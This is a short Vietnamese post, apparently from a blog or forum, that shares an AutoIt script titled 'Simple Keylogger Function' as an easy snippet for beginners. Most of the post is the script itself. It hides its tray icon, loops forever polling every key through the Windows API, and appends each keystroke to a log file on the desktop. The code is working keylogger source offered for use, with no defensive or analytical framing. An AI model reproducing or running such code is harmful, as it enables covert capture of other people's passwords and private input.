Simple Keylogger FunctionHôm nay mình xin chia sẽ cho mọi người 1 đoạn Code khá hay và đơn giản cho mọi người mới tập tành lập trình AutoIt như mình ^^
Bên dưới là đoạn code cho ai là dân lập trình AutoIt
#NotrayIcon
#include 
;==============================
; AutoIt
; Autor : M3
; Simple KeyLoguer Function
;==============================

sGetKey()

Func sGetKey()

While 1

Local  $sKey, $Result , $Log

For $sKey = 1 To 255

$Result = _WinAPI_GetAsyncKeyState($sKey)

If $Result = -32767 then

$Result = Chr($sKey)

$Log = FileOpen(@DesktopDir & "\Log.txt", 1)

FileWrite($Log, $Result)

FileClose($Log)

EndIf

Next

WEnd

Endfunc

Chúc các bạn thành công !


Related Posts